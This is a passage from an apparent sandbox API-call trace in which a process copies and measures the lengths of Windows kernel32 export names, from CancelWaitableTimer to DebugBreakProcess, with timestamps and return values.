returned="CancelWaitableTimer" [0082.727] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.727] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.727] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.727] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.727] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.727] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.727] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.727] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.727] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.727] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.727] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.727] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.727] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.728] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.728] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.728] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.728] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.728] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.728] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.728] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.728] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.728] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.728] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.728] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.728] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.728] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.728] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.728] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.728] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.728] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.728] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.728] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.728] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.728] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.728] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.728] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.728] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.728] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.728] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.728] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.728] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.728] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.728] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.728] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.728] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.728] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.728] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.728] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.728] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.729] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.729] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.729] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.729] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.729] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.729] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.729] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.729] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.729] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.729] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.729] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.729] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.729] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.729] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.729] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.729] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.729] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.729] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.729] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.729] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.729] lstrlenA (lpString="COPYFILEA") returned 9 [0082.729] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.729] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.729] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.729] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.729] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.729] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.729] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.729] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.729] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.729] lstrlenA (lpString="COPYFILEW") returned 9 [0082.729] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.729] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.729] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.729] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.730] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.730] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.730] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.730] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.730] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.730] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.730] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.730] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.730] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.730] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.730] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.730] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.730] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.730] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.730] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.730] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.730] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.730] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.731] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.731] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.731] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.731] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.731] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.731] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.731] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.731] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.731] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.731] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.731] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.731] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.731] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.731] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.731] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.731] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.731] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.731] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.731] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.731] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.731] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.731] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.731] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.731] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.731] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.731] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.731] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.731] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.731] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.731] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.731] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.731] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.731] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.731] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.731] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.731] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.731] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.732] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.732] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.732] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.732] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.732] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.732] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.732] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.732] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.732] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.732] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.732] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.732] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.732] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.732] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.732] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.732] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.732] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.732] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.733] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.733] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.733] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.733] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.733] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.733] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.733] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.733] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.733] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.733] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.733] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.733] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.733] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.733] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.733] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.733] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.733] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.733] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.733] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.733] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.733] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.733] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.733] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.733] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.733] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.733] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.733] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.733] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.733] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.733] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.733] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.733] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.733] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.733] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.733] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.733] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.733] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.734] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.734] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.734] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.734] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.734] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.734] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.734] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.734] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.734] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.734] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.734] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.734] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.734] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.734] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.734] lstrcpyA (in: lpString1=0x3f2d468, 